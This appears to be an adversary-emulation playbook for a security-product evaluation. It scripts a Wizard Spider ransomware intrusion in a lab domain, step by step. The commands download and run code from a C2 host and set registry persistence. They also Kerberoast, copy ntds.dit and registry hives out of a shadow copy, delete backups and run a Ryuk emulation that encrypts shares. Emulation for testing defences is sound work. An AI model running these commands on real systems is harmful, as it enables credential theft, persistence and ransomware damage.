#
Scenario Overview (Protections)
This scenario emulates Wizard Spider conducting a ransomware attack against a notional organization (Oz Inc).
This scenario emulates Wizard Spider TTPs based on several malware specimens either used by or associated with the Wizard Spider actors:
- Emotet
- Trickbot
- Ryuk
The steps in this scenario are grouped to support Protections Evaluations.
#
Test 1 (steps 1-3)
#
Step 1 - Initial Compromise
🎤 Voice Track:
Step1 emulates Wizard Spider gaining initial access using a Microsoft Word document.
The word document contains obfuscated VBA macros that downloads and executes a malicious DLL.
The malicious DLL establishes a C2 session with the adversary control server.
The malicious DLL is based on Emotet.
Compromised user info:
User: judy@oz.local
System: 10.0.0.7 / dorothy
C2: 192.168.0.4:80 HTTP; traffic is AES-encrypted with symmetric key and base64 encoded
Note: the document is pre-positioned in the environment.
We do not emulate sending the document to target, as our focus is evaluating their product against post-initial-access TTPs.
#
☣️ Procedures
Upload the Emotet-dropper document to Dorothy's desktop:
smbclient -U 'oz\judy' //10.0.0.7/C$ -c "put wizard_spider/Resources/Emotet_Dropper/ChristmasCard.docm Users/judy/Desktop\ChristmasCard.docm;" "Passw0rd!"
Start the control server from your terminator terminal.
cd ~/wizard_spider/Resources/control_server
sudo ./controlServer
Open a new terminal tab (ctrl-shift-T); double click the terminal tab and rename it to "RDP to Dorothy"
RDP into Dorothy / 10.0.0.7 as user Judy:
xfreerdp +clipboard /u:oz\\judy /p:"Passw0rd!" /v:10.0.0.7
Open outlook if its not already open, log in to Office account if not already logged in
Open the ChristmasCard.docm document on the desktop; enable macros when prompted.
You should see a terminal flash; wait for it to execute the Emotet DLL.
Go back to your control server tab; you should have a new callback.
Take a screenshot of your new session, and paste in the vendor slack channel.
# Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads. [6][13][2][8][12]
Source Code - Dropper Word Document
For testing without MS Office; be aware that this is not identical to the Word document implementation - the process lineage and file paths change significantly with this method.
Open PowerShell and run:
Invoke-WebRequest -Uri http://192.168.0.4:8080/getFile/adb.txt -OutFile $env:AppData\adb.vbs
# Wizard Spider has used HTTP for network communications.[5]
cscript.exe $env:AppData\adb.vbs
#
🔬 Cited Intelligence
https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf
https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor
https://blog.talosintelligence.com/2019/01/return-of-emotet.html
#
Step 2 - Emotet Persistence
🎤 Voice Track:
Wizard Spider establishes registry persistence by adding the registry key:
Path: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Key: blbdigital
Value: rundll32.exe %userprofile%\Ygyhlqt\Bx5jfmo\R43H.dll,Control_RunDLL
The registry key is written using the RegSetValueExA
WinAPI function.
#
☣️ Procedures
Open a horizontal terminal tab (right-click split horizontally).
Copy/paste the command in your lower terminal tab:
# Emotet has been observed adding the downloaded payload to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key to maintain persistence.[6][7][8]
# Wizard Spider has established persistence via the Registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and a shortcut within the startup folder.[2][3]
./evalsC2client.py --set-task DOROTHY_DABB41A5 1
#
🔬 Cited Intelligence
#
Step 3 - Emotet Host Discovery and Credential Collection
🎤 Voice Track:
Wizard Spider first enumerates local processes using WinAPI functions: CreateToolhelp32Snapshot
and Process32First
.
Wizard Spider then downloads and loads an Outlook scraper DLL using the LoadLibraryW
and GetProcAddress
functions.
Lastly, Wizard Spider executes the Outlook-scraper to dump emails and contacts.
One of the emails contains credentials for another user, bill@oz.local, which will be used in the next step.
Download Info:
URL (HTTP GET): http://192.168.0.4:80/modules
Download occurs over HTTP. All traffic is AES encrypted and base64 encoded in transit.
File Write: C:\Windows\SysWOW64\Outlook.dll
#
☣️ Procedures
Enumerate processes.
# Emotet has been observed enumerating local processes.[17]
./evalsC2client.py --set-task DOROTHY_DABB41A5 2
Download Outlook Scraper DLL from C2 channel (192.168.0.4:80 / HTTP) to current working directory.
./evalsC2client.py --set-task DOROTHY_DABB41A5 3
Load Outlook Scraper DLL into emotet's address space via call to LoadLibraryW() and GetProcAddress().
./evalsC2client.py --set-task DOROTHY_DABB41A5 4
Scrape email content from Outlook inbox via _popen call to PowerShell.
# Emotet has been observed leveraging a module that scrapes email data from Outlook.[3]
# Emotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user. [7][3]
./evalsC2client.py --set-task DOROTHY_DABB41A5 5
_popen info, because I've never heard of it either
Scrape email addresses from inbox.
# Emotet has been observed leveraging a module that can scrape email addresses from Outlook.[3][4]
./evalsC2client.py --set-task DOROTHY_DABB41A5 8
⚠️ Sign out of RDP session: Right-click Windows icon -> Shut down or sign out -> Sign out
#
🔬 Cited Intelligence
https://unit42.paloaltonetworks.com/emotet-command-and-control/
https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/
https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/
https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.88_ENG.pdf
#
Test 2 (Steps 4-6)
#
Step 4 - Move Laterally Deploy TrickBot
🎤 Voice Track:
During this step, Wizard Spider uses bill's credentials to RDP into Toto.
Wizard Spider uploads and executes a malicious EXE based on TrickBot.
Trickbot is uploaded to target using an RDP-mounted network share.
Once executed, Trickbot calls back to the C2 server over HTTP.
Compromised user info:
User: bill@oz.local
System: 10.0.0.8 / toto
File Write (Tribot EXE): %AppData%\uxtheme.exe
C2: 192.168.0.4:447 HTTP - no encryption or obfuscation
#
☣️ Procedures
Change your RDP tab name to "RDP into Toto"
RDP into Toto and create RDP drive that has TrickBot folder structure
# Wizard Spider has used RDP for lateral movement.[5][2][8]
cd ~/
xfreerdp +clipboard /u:oz\\bill /p:"Fall2021" /v:10.0.0.8 /drive:X,wizard_spider/Resources/TrickBot/WNetval
Open CMD.exe
and copy file to bill's AppData\Roaming
⚠️ make sure you're in a CMD
shell
copy \\tsclient\X\TrickBotClientExe.exe %AppData%\uxtheme.exe
Kick off exeuction by starting TrickBotClientExe.exe
cd %AppData%
uxtheme.exe
#
🔬 Cited Intelligence
#
Step 5 - TrickBot Discovery
🎤 Voice Track:
In step 5 Wizard Spider uses TrickBot to perform detailed system discovery.
You will see TrickBot executing shell commands, such as systeminfo, sc.exe, net.exe, and so on.
Trickbot executes commands via the C standard library function, system()
.
#
☣️ Procedures
Switch back to your C2 terminal window.
Execute the following commands.
# TrickBot gathers the OS version, machine name, CPU type, amount of RAM available, and UEFI/BIOS firmware information from the victim’s machine.[1][2][7][12]
./evalsC2client.py --set-task TrickBot-Implant "systeminfo > discovery.txt"
# TrickBot collects a list of install programs and services on the system’s machine.[1]
./evalsC2client.py --set-task TrickBot-Implant "sc query >> discovery.txt"
# TrickBot collects the users of the system.[1][6]
./evalsC2client.py --set-task TrickBot-Implant "net user >> discovery.txt"
./evalsC2client.py --set-task TrickBot-Implant "net user /domain >> discovery.txt"
# TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine.[1][6][7]
./evalsC2client.py --set-task TrickBot-Implant "ipconfig /all"
./evalsC2client.py --set-task TrickBot-Implant "netstat -tan"
# Trickbot gathers domain specfic/client specfic information
./evalsC2client.py --set-task TrickBot-Implant "net config workstation >> discovery.txt"
./evalsC2client.py --set-task TrickBot-Implant "nltest /domain_trusts /all_trusts >> discovery.txt"
# TrickBot can identify the groups the user on a compromised host belongs to.[7]
./evalsC2client.py --set-task TrickBot-Implant "whoami /groups >> discovery.txt"
#
🔬 Cited Intelligence
- https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf
- https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre
- https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module/
- https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- https://eclypsium.com/wp-content/uploads/2020/12/TrickBot-Now-Offers-TrickBoot-Persist-Brick-Profit.pdf
#
Step 6 - Kerberoast the DC
🎤 Voice Track:
In this step Wizard Spider performs Kerberoasting using a public tool, Rubeus.
Through Kerberoasting, Wizard Spider obtains encrypted credentials for the domain admin, vfleming.
Wizard Spider cracks the credentials offline for use in the next step.
Note: offline cracking isn't performed due to time constraints; its also not in scope for the evaluation, so we skip the behavior.
#
☣️ Procedures
# Wizard Spider has used Rubeus, MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet to steal AES hashes.[6][3][2][8]
./evalsC2client.py --set-task TrickBot-Implant "get-file rubeus.exe"
./evalsC2client.py --set-task TrickBot-Implant "rubeus.exe kerberoast /domain:oz.local"
#
🔬 Cited Intelligence
- https://us-cert.cisa.gov/ncas/alerts/aa20-302a
- https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
- https://thedfirreport.com/2020/10/08/ryuks-return/
- https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/
#
Test 3 (Step 7)
#
Step 7 - Lateral Movement to DC
🎤 Voice Track:
In step 7 Wizard Spider RDP's into the domain controller as user vfleming.
Wizard Spider dowloads a TrickBot variant to the DC using PowerShell's Invoke-WebRequest
command.
Wizard Spider then establishes registry persistence to execute Trickbot when vflemming logs in.
Lastly, Wizard Spider enumerates the domain using the adfind
utility.
Compromised user info:
User: vfleming@oz.local
System: 10.0.0.4 / wizard
File Write (Tribot EXE variant): %AppData%\uxtheme.exe
Registry Write: HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
Key: Userinit
Value: Userinit.exe, $env:AppData\uxtheme.exe
#
☣️ Procedures
⚠️ Go back to your Toto RDP session and sign out: Right-click Windows icon -> Shut down or sign out -> Sign out
Rename your RDP terminal to "RDP to wizard"
RDP to wizard / 10.0.0.4.
# Wizard Spider has used RDP for lateral movement.[5][2][8]
xfreerdp +clipboard /u:oz\\vfleming /p:"q27VYN8xflPcYumbLMit" /v:10.0.0.4 /drive:X,wizard_spider/Resources/Ryuk/bin
⚠️ Open an administrator powershell.
Download a trickbot variant (same binary with a zero appended to the very end)
# Wizard Spider has established persistence using Userinit by adding the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.[3]
Invoke-WebRequest -Uri http://192.168.0.4:8080/getFile/uxtheme.exe -OutFile $env:AppData\uxtheme.exe
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, $env:AppData\uxtheme.exe" -Force
# Wizard Spider has also used AdFind and nltest/dclist to enumerate domain computers, including the domain controller.[4][5][3][7][6]
adfind -f "(objectcategory=group)"
#
🔬 Cited Intelligence
- https://us-cert.cisa.gov/ncas/alerts/aa20-302a
- https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
- https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/
- https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/
- https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
- https://thedfirreport.com/2020/10/08/ryuks-return/
- https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
#
Test 4 (Step 8)
#
Step 8 - Dump Active Directory Database (ntds.dit)
🎤 Voice Track:
During step 8, Wizard Spider creates a volume shadow copy in order to collect the active directory database (ntds.dit).
Wizard Spider uses vssadmin to create the shadow copy.
Wizard Spider exfiltrates the shadow copy files using an RDP-mounted network share.
#
☣️ Procedures
⚠️ Spawn a CMD shell within your PowerShell window:
cmd.exe
cls
# Wizard Spider has gained access to credentials via exported copies of the ntds.dit Active Directory database.[3]
vssadmin.exe create shadow /for=C:
You will get output resembling the following:
vssadmin output:
Shadow Copy ID: {cb0a1e0b-e4d7-44f4-aacb-daed56db01ce}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
⚠️ Make sure the \\\\?\GLOBALROOT...HarddiskVolumeShadowCopy1
path matches your output!
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit \\TSCLIENT\X\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM \\TSCLIENT\X\VSC_SYSTEM_HIVE
reg SAVE HKLM\SYSTEM \\TSCLIENT\X\SYSTEM_HIVE
Notionally, Wizard Spider carves credentials offline from ntds.dit using tools like Impacket's secretsdump.py
#
🔬 Cited Intelligence
#
Test 5 (Step 9)
#
Step 9 - Ryuk Inhibit System Recovery
🎤 Voice Track:
In step 9, Wizard Spider prepares to deploy an executable based on the Ryuk ransomware.
At the beginning of this step, Wizard Spider mounts the C$ share of a lateral host, toto / 10.0.0.8.
Files on Toto will be encrypted in the next step.
Next, Wizard Spider uploads two files to disk: kill.bat and window.bat.
These files are used to stop specific services and delete backups prior to encrypting the system.
#
☣️ Procedures
In the CMD session, mount share so Ryuk can encrypt lateral drives:
net use Z: \\10.0.0.8\C$
# Ryuk has called kill.bat for stopping services, disabling services and killing processes.[1]
# Ryuk can launch icacls /grant Everyone:F /T /C /Q to delete every access-based restrictions on files and directories.[4]
# Ryuk has stopped services related to anti-virus.[2]
copy \\TSCLIENT\X\kill.bat C:\Users\Public\kill.bat
C:\Users\Public\kill.bat
# Ryuk has used vssadmin Delete Shadows /all /quiet to to delete volume shadow copies and vssadmin resize shadowstorage to force deletion of shadow copies created by third-party applications.[1]
copy \\TSCLIENT\X\window.bat C:\Users\Public\window.bat
C:\Users\Public\window.bat
#
🔬 Cited Intelligence
- https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
- https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf
#
Test 6 (Step 10)
#
Step 10 - Ryuk Encryption for Impact
🎤 Voice Track:
In our final test, Wizard Spider uploads and executes Ryuk.
Ryuk is uploaded using the RDP-mounted network share, and executed from CMD.
When Ryuk executes, it will first gain SeDebugPrivilege
.
Ryuk will then and inject its own executable into a remote process,notepad.exe, via WriteProcessMemory
and CreateRemoteThread
WinAPI calls.
From the remote process, Ryuk will encrypt files on wizard/10.0.0.4's C:\Users\Public directory (recursive).
Next, Ryuk encrypts files on Toto/10.0.0.8 at \C$\Users\Public (mounted on wizard as Z:).
Ryuk uses a symmetric key algorithm, AES256 to encrypt files.
Note that the symmetric key is itself encrypted with RSA2048.
Note: early versions of our Ryuk emulation encrypted the entire filesystem; however, this proces took hours, rather than minutes, so we scaled it back due to time constraints.
#
☣️ Procedures
From the pre-existing CMD session, run the following:
# Ryuk has attempted to adjust its token privileges to have the SeDebugPrivilege.[11]
# Ryuk has called CreateToolhelp32Snapshot to enumerate all running processes.[1]
# Ryuk has injected itself into remote processes to encrypt files using a combination of VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.[1]
# Ryuk has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.[1]
# Ryuk has used the C$ network share for lateral movement.[5]
# Ryuk has called GetIpNetTable in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries.[1][5]
copy \\TSCLIENT\X\ryuk.exe C:\Users\Public\ryuk.exe
C:\Windows\System32\notepad.exe
C:\Users\Public\ryuk.exe --encrypt --process-name notepad.exe
To confirm that encryption worked, execute the following in CMD:
# confirm files are encrypted (local)
type C:\Users\Public\Documents\Whitepaper_ekFUNt.rtf
# confirm encryption (remote)
type \\toto\C$\Users\Public\Documents\Whitepaper_ekFUNt.rtf
#
🔬 Cited Intelligence
- https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
- https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/
- https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf
- https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/